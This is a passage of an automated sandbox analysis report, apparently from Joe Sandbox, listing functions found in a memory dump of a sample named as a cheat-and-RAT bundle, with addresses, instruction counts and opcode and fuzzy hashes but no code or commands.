                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e1e18e1193ec8fa09332ef06e6417f96d8446030292157e8fd544e391baa78a1
                                        • Instruction ID: 715e8a3d2a40fbd835472b8e82622535c4eb0b205ae2fd87f8b05ec3f719e940
                                        • Opcode Fuzzy Hash: e1e18e1193ec8fa09332ef06e6417f96d8446030292157e8fd544e391baa78a1
                                        • Instruction Fuzzy Hash: C5B21F3470874ACFDB09DBA8D460B94B7E1FF5E365F5402F5E409CB2D6C968A8C1CA26
                                        Function 00007FFD9BAA3EF9 Relevance: .4, Instructions: 371COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d8dc687e33d7d65f176af4210289696c85c6356c5fd27705a5fe45814b34d64
                                        • Instruction ID: 67f8059dccb3cef234a5013073dd9e80930e12c69b213fad7deb95f84d4f5024
                                        • Opcode Fuzzy Hash: 3d8dc687e33d7d65f176af4210289696c85c6356c5fd27705a5fe45814b34d64
                                        • Instruction Fuzzy Hash: 3BC14831B0964E4FEBA4DB6888652B97BE2EF89310F05017EE41DD72E2CE686906C751
                                        Function 00007FFD9BAA2FF0 Relevance: .3, Instructions: 303COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 20b2d51e619087d9c2a1f4f5c50f63b059d622f0d7d885199ac425fbdf8e63e1
                                        • Instruction ID: 20c750eab4d2e005074b6175e5d1a1a73c342a88f883540a59450d8c9867b037
                                        • Opcode Fuzzy Hash: 20b2d51e619087d9c2a1f4f5c50f63b059d622f0d7d885199ac425fbdf8e63e1
                                        • Instruction Fuzzy Hash: 02812731B1CB4D0FDBA8DB6C98556BA7BD2EB98350F00427FE44DD3296DE74A9028781
                                        Function 00007FFD9BAA10A5 Relevance: .3, Instructions: 302COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 58a2eac8ae7e69ce5629ee15e3cbb69158a7c7dc050c9909d3240e23fc811e9b
                                        • Instruction ID: 8d1341b644d3fd0324bf53c3104a1da93d350ee1421e3de2c72a63bd05038374
                                        • Opcode Fuzzy Hash: 58a2eac8ae7e69ce5629ee15e3cbb69158a7c7dc050c9909d3240e23fc811e9b
                                        • Instruction Fuzzy Hash: B6B11B21B0E68A4FEBB5DFA884312B97792FF96314F0501BAD459CB1E7CE64B901C361
                                        Function 00007FFD9BAA0E40 Relevance: .3, Instructions: 289COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 837e875434b979b5bfa8050a4eab5790b37e93e64e95f599b14b3d87781fad38
                                        • Instruction ID: 125c021e6f151ef5c1b786815134450286244aecd95946c4f625c06346ce36ef
                                        • Opcode Fuzzy Hash: 837e875434b979b5bfa8050a4eab5790b37e93e64e95f599b14b3d87781fad38
                                        • Instruction Fuzzy Hash: E2812631B0CA4D4FD7A8DBAC9455AB9B7E2EF98351F05427FD04EC32E5DE64A8428780
                                        Function 00007FFD9BAA0E48 Relevance: .3, Instructions: 272COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dbc620514984de1b69a85b463f49622b13629994dc9083f45e1b7165aa6b44f3
                                        • Instruction ID: 4d1d32dc7be533587ebcb876e2b0eb25fb4d636a093c1ca386a63be82c5d0725
                                        • Opcode Fuzzy Hash: dbc620514984de1b69a85b463f49622b13629994dc9083f45e1b7165aa6b44f3
                                        • Instruction Fuzzy Hash: 55714831B1CB490FE768AB6C982667977C2DF99320F04027EF44DC72E7DD64A8428382
                                        Function 00007FFD9BAA53D5 Relevance: .2, Instructions: 244COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bbc9d468ce3278e8448d3640082a7f00a0efe31416d641bb42ea02c787beb0a2
                                        • Instruction ID: 8ac2698c7ee77277294a47f0412f8af2adf2851cf542565a09f8e25c74112638
                                        • Opcode Fuzzy Hash: bbc9d468ce3278e8448d3640082a7f00a0efe31416d641bb42ea02c787beb0a2
                                        • Instruction Fuzzy Hash: D951CF31A0CB4C4FDB58DF9888556EDBBF2FF99310F0442ABD449D7256CA74A845CB82
                                        Function 00007FFD9BAA6C19 Relevance: .2, Instructions: 201COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40634432781234ac6e49a0125d4b2ca852e8af96848d7607d39e04846232c04a
                                        • Instruction ID: f4ff40475cc89557628699bf3625fd765322db41e2ddb1e7a7ec5a8e7520a550
                                        • Opcode Fuzzy Hash: 40634432781234ac6e49a0125d4b2ca852e8af96848d7607d39e04846232c04a
                                        • Instruction Fuzzy Hash: 4661C121A0964E8FEBA4EFAC88656B97BE2EF49340F0500B5D40DC71E7CE686D418B61
                                        Function 00007FFD9BAA0E70 Relevance: .2, Instructions: 199COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5e251dd2f99f944610e4d6776ad63cd5be17bbed1a0ab0dae61a5d62af792fd3
                                        • Instruction ID: bc490e826b8d32928f5018bb8cc2217492a1e50dd0fec53f79173f23efff3a39
                                        • Opcode Fuzzy Hash: 5e251dd2f99f944610e4d6776ad63cd5be17bbed1a0ab0dae61a5d62af792fd3
                                        • Instruction Fuzzy Hash: 8851D471F0AA4D4FEF58CB9888656BD77E3EFA9314F05417AD04DE3292CA742901C761
                                        Function 00007FFD9BAA13ED Relevance: .2, Instructions: 197COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d8fa5e0153e3b4b85898922465db4851eefb977b68559c914c63d554569de9fc
                                        • Instruction ID: d022b1df8a8ccb7d91c1dafc98b41758ebe04e61c6e133a8215925e1fdcf8b17
                                        • Opcode Fuzzy Hash: d8fa5e0153e3b4b85898922465db4851eefb977b68559c914c63d554569de9fc
                                        • Instruction Fuzzy Hash: 9E71AC30E0564D8FDB94EFA4C865BECB7B2EF45304F5501B9D049EB2A2CEB92985CB11
                                        Function 00007FFD9BAA0A38 Relevance: .2, Instructions: 159COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 664f853f11c94ede707e2f1cb40568893c186d5baa1b865872c815fd97cb8de3
                                        • Instruction ID: 53804b8c717c7fbc9f5bec6a8b7b906c82fd11a46b3a056e3f9e16de2d71024c
                                        • Opcode Fuzzy Hash: 664f853f11c94ede707e2f1cb40568893c186d5baa1b865872c815fd97cb8de3
                                        • Instruction Fuzzy Hash: 1E516E30A04A4E8FDB94EF58C850AEA73B2FF58314F504A69E42DC72E5CB74E951CB90
                                        Function 00007FFD9BAA2E19 Relevance: .2, Instructions: 153COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 916fa7eabedc31e048d2cd6f7b5c1e42b08c420e9b1e55a826d4cd8329650c84
                                        • Instruction ID: 81d389581db892b702b04e61aa24bf4476389bd66eda9af7def9bc4b2d5423fb
                                        • Opcode Fuzzy Hash: 916fa7eabedc31e048d2cd6f7b5c1e42b08c420e9b1e55a826d4cd8329650c84
                                        • Instruction Fuzzy Hash: BD413930B1D7494FE329AB6C58266B577D1DF8A721F0402BEF449C72E3DD64B8428297
                                        Function 00007FFD9BAA1B55 Relevance: .1, Instructions: 148COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e961c6c67570f72e805881601c5608caadfa750ad2b1dfbb4f47a1393fe785af
                                        • Instruction ID: 925250b179855ff324ac72fe5bf99f467d0bb66f2404be855f6e22c9a8aba9fa
                                        • Opcode Fuzzy Hash: e961c6c67570f72e805881601c5608caadfa750ad2b1dfbb4f47a1393fe785af
                                        • Instruction Fuzzy Hash: B6519271609B8E4FDB98CF1888B0A6537A2FF6A304B15019DE4ADC72D2DB75E912C750
                                        Function 00007FFD9BAA4068 Relevance: .1, Instructions: 142COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d3e050a807ae11843d40f41973e0cc2be6bbda4315808161107804861115c352
                                        • Instruction ID: 947a0d719df53ff0fba3013d0c62a2073c5462a8abc37c5ae88f3b5683b7c5ce
                                        • Opcode Fuzzy Hash: d3e050a807ae11843d40f41973e0cc2be6bbda4315808161107804861115c352
                                        • Instruction Fuzzy Hash: 4141E471B0990E8FEB98DF58C4646B977E2FFA8300F14413EE419D32A4DE78A942CB50
                                        Function 00007FFD9BAA6CCD Relevance: .1, Instructions: 139COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ba4c2e82f7d118fea6361dfbd1531b9667f9d7472af93de785f93cee9abde56c
                                        • Instruction ID: 3b5bab63e73073137beed578263beed1fc391f4d3e9ea8cc26592b669486dd06
                                        • Opcode Fuzzy Hash: ba4c2e82f7d118fea6361dfbd1531b9667f9d7472af93de785f93cee9abde56c
                                        • Instruction Fuzzy Hash: 5541D530E1964E8FD794EBA8C865AB9B7E1FF09300F4501B6D00AC72E2CE746D41C751
                                        Function 00007FFD9BAA164A Relevance: .1, Instructions: 92COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c45915b729012aa969a18785a4cb46d1a4d1918613d924106b4deb0e1d3ddf97
                                        • Instruction ID: 71ce0ea9516c6d76e5a91225f54dbb24e4354ced83cf8917e835c1c94ac4e9c1
                                        • Opcode Fuzzy Hash: c45915b729012aa969a18785a4cb46d1a4d1918613d924106b4deb0e1d3ddf97
                                        • Instruction Fuzzy Hash: 19214931B1CA4E0FD7B4EB7C542A67477D2EF99624B0502FAE00DC32A3DC689C428391
                                        Function 00007FFD9BAA2A7A Relevance: .1, Instructions: 92COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dcd7016afe915bd77aa9d5114bf8c076743d59a76a3388f95cab5b99091aa567
                                        • Instruction ID: 8d40a5caf482992f89c3744b70c3f2c544bb8208ce2792980745b00e2278f81c
                                        • Opcode Fuzzy Hash: dcd7016afe915bd77aa9d5114bf8c076743d59a76a3388f95cab5b99091aa567
                                        • Instruction Fuzzy Hash: 8D21293065E7CA4FD767D7B888204657BE1EF9232170641BBD489CB1B2CE58D942C752
                                        Function 00007FFD9BAA6E6D Relevance: .1, Instructions: 87COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e7120bb1d6a46844fc41440c59408d177052891f3d22557da2adfbc83fc3c5f
                                        • Instruction ID: 0ddae400c03c66126574ff642841c7f608fdbc6d5737a3a4d98f4b0bacd7411c
                                        • Opcode Fuzzy Hash: 1e7120bb1d6a46844fc41440c59408d177052891f3d22557da2adfbc83fc3c5f
                                        • Instruction Fuzzy Hash: 78210A31A0954D4FD751DFB8C8256D9BBF1EF4A310B0541FBD049CB2A3DA3859468B61
                                        Function 00007FFD9BAA07B8 Relevance: .1, Instructions: 85COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 678dfb1a629fe3069db2959aa7deae3a161b237479262767e423cb7be642b34e
                                        • Instruction ID: f6fb3219cb56ad31cf60b665f5e9ace66c911484adaf4beddc8e256a7f918eb3
                                        • Opcode Fuzzy Hash: 678dfb1a629fe3069db2959aa7deae3a161b237479262767e423cb7be642b34e
                                        • Instruction Fuzzy Hash: AD112921B19D0D0FE6B4EB6C546A67573C3EF9C760F0505BAE00DC32A2DC64AC418391
                                        Function 00007FFD9BAA3F65 Relevance: .1, Instructions: 80COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 239b63489c51ddf89a36c0b6fa33db8adfe4b4cafad46ccc73c7aab922f88743
                                        • Instruction ID: 7ff427705909afcc320d147cb40e7b47478f8aabaddee0d93569734ac216ef66
                                        • Opcode Fuzzy Hash: 239b63489c51ddf89a36c0b6fa33db8adfe4b4cafad46ccc73c7aab922f88743
                                        • Instruction Fuzzy Hash: 9011F632F0A95E5AF7B097A848312F976D2EF44310F42017DE41DE30F2DD9D2A0A2691
                                        Function 00007FFD9BAA3E74 Relevance: .1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e4d9875db5ff8120d17cf22fd3f259f7c6aa0621dae4626a9d771726d6c8a871
                                        • Instruction ID: 4f2cbe72fb755911ea3cdafdc7d6d7d3ed9d2c34fff01af496469b28788ae167
                                        • Opcode Fuzzy Hash: e4d9875db5ff8120d17cf22fd3f259f7c6aa0621dae4626a9d771726d6c8a871
                                        • Instruction Fuzzy Hash: 9B016B20A0DA4A0FE776AB3844716647FD0DF86250F0901BBE449CB1E3DD9959C18313
                                        Function 00007FFD9BAA426F Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf4c549ec694037bea3acdf5c513f1e68c7a708446e71c5f0d116e249041f3b3
                                        • Instruction ID: 3d8e164a0f88fc49d6b266210dbf969362d73188d5ae2b587261151d1886679c
                                        • Opcode Fuzzy Hash: bf4c549ec694037bea3acdf5c513f1e68c7a708446e71c5f0d116e249041f3b3
                                        • Instruction Fuzzy Hash: 60014E32A0EA4D4BDF149B969C601D67795FF84325F04027EE41CC31A0DB655559C751
                                        Function 00007FFD9BAA17E9 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f10f9bf8321f529c0ced0337f95b656381c576e79da2d23d43a5f7b89d96275
                                        • Instruction ID: 9312889edddbe5d3b56f9f045c63d10e17040ed445c3ba59f1149d1c2c442bac
                                        • Opcode Fuzzy Hash: 5f10f9bf8321f529c0ced0337f95b656381c576e79da2d23d43a5f7b89d96275
                                        • Instruction Fuzzy Hash: EF01843150DB8D5FC795D718D4605E6BFE1EF99320F45057EF489C72A1CE649A40C782
                                        Function 00007FFD9BAA0E10 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1852918e1a50e5f4158d964346477ae51b73e3712b6eabe7a0caa04ea20ee6f
                                        • Instruction ID: 905b6c9d73ec24e9cbdac9b850ce337cb461add39e3b5688a4f084909ff238aa
                                        • Opcode Fuzzy Hash: a1852918e1a50e5f4158d964346477ae51b73e3712b6eabe7a0caa04ea20ee6f
                                        • Instruction Fuzzy Hash: 78F0A43260DB4D5BD7A8DB08D464AAAB7D2FFD8350F80053EF04AD33A0CEA5A9408781
                                        Function 00007FFD9BAA1A80 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 58d479abf84b05a2fe89624539a95677395b7a994b3fa41342551a6157bfc610
                                        • Instruction ID: e3fb00572566190795105fc34416ae213bdd8aaa1fc225211864039f80e695ab
                                        • Opcode Fuzzy Hash: 58d479abf84b05a2fe89624539a95677395b7a994b3fa41342551a6157bfc610
                                        • Instruction Fuzzy Hash: DBE0C071E0DB4C4FDF50AB5CA8205D93BA1FF86314F050069E01CC3280D6315D50C352
                                        Function 00007FFD9BAA09AD Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cbb275320111cfbffed960fde6f18e95ba66fd8629fef6b740c3c86207fa433d
                                        • Instruction ID: 9e6e218527c042c772bb9b797a11596617eeebc4fe14f81f213d53d6a3666bff
                                        • Opcode Fuzzy Hash: cbb275320111cfbffed960fde6f18e95ba66fd8629fef6b740c3c86207fa433d
                                        • Instruction Fuzzy Hash: 57E0C222F4580E09EB24B3B42C369FDB28AEF88218FC24871E01DC20CBCD192A060181
                                        Function 00007FFD9BAA0CFD Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70e8918fe7371c9bab7c28701d053cb59719dfdc8c999140cfded29c7f65db44
                                        • Instruction ID: 2f4ce5eb3d920587ac7f8290b9bbbb02d000d5c1b0206ab61b5fe9b138ad115a
                                        • Opcode Fuzzy Hash: 70e8918fe7371c9bab7c28701d053cb59719dfdc8c999140cfded29c7f65db44
                                        • Instruction Fuzzy Hash: BFE0C222F9580F09EB58B7B42C369FDB246DF88218BC14871E02DC20CBCD592A054182
                                        Function 00007FFD9BAA08FE Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dd1a2f019c20f55140584e6d519474c2cd632d562cf6ff998675ad0261647f8e
                                        • Instruction ID: 2dddd3a1e773199ea479f942bd8d8e2a75f047c4d439b239467c99f2fca11d05
                                        • Opcode Fuzzy Hash: dd1a2f019c20f55140584e6d519474c2cd632d562cf6ff998675ad0261647f8e
                                        • Instruction Fuzzy Hash: 8AD05B3255C7094BC314DF54E4508DAB7A0FF88374F404B3DE0AE911E5DF6893818786
                                        Function 00007FFD9BAA0C57 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16221b124af57809d56b8f66c6381ec09069ae95c286170e2da7745caba2f83e
                                        • Instruction ID: ed5ee3db7d2cea3de7998dfdb7915874a8c9d1ef98afe3509fdc72c9578aace5
                                        • Opcode Fuzzy Hash: 16221b124af57809d56b8f66c6381ec09069ae95c286170e2da7745caba2f83e
                                        • Instruction Fuzzy Hash: 3AD05E3192CB094BD354DF14E4508DAB7A0FF84734F800B2DF06E861E5EEB492818686
                                        Function 00007FFD9BAA3F43 Relevance: .0, Instructions: 13COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c1835ec983f8286ee927086eca9fc6c5acbbfd69d037307dc2ae36630af36f63
                                        • Instruction ID: 98e02ff3b6050c2a3530fdaddcda453fd662efa5ca362ba9b21abe93554385fc
                                        • Opcode Fuzzy Hash: c1835ec983f8286ee927086eca9fc6c5acbbfd69d037307dc2ae36630af36f63
                                        • Instruction Fuzzy Hash: 40C0123252C64957D341A750E461CEB7351BF90210F801B79F05A41099DD5CA6448582

                                        Non-executed Functions

                                        Function 00007FFD9BAA0700 Relevance: 8.9, Strings: 7, Instructions: 144COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ?O_I$O_^ $O_^"$O_^0$O_^2$O_^4$O_^6
                                        • API String ID: 0-943114137
                                        • Opcode ID: f5d01d13cb062e7409fc55f73c56501c7fa28213c1a1ceff6974860a690654d4
                                        • Instruction ID: 14e6d2f7f5237597f971bd2ae7fd0060985976b78b57c8a2ed70fa5c8be8d4be
                                        • Opcode Fuzzy Hash: f5d01d13cb062e7409fc55f73c56501c7fa28213c1a1ceff6974860a690654d4
                                        • Instruction Fuzzy Hash: 82416B5370F6810BE7316BAC2C610E86B51EF5472A71882F7E0ED8E1DBE8546946C298
                                        Function 00007FFD9BAA0758 Relevance: 5.0, Strings: 4, Instructions: 17COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
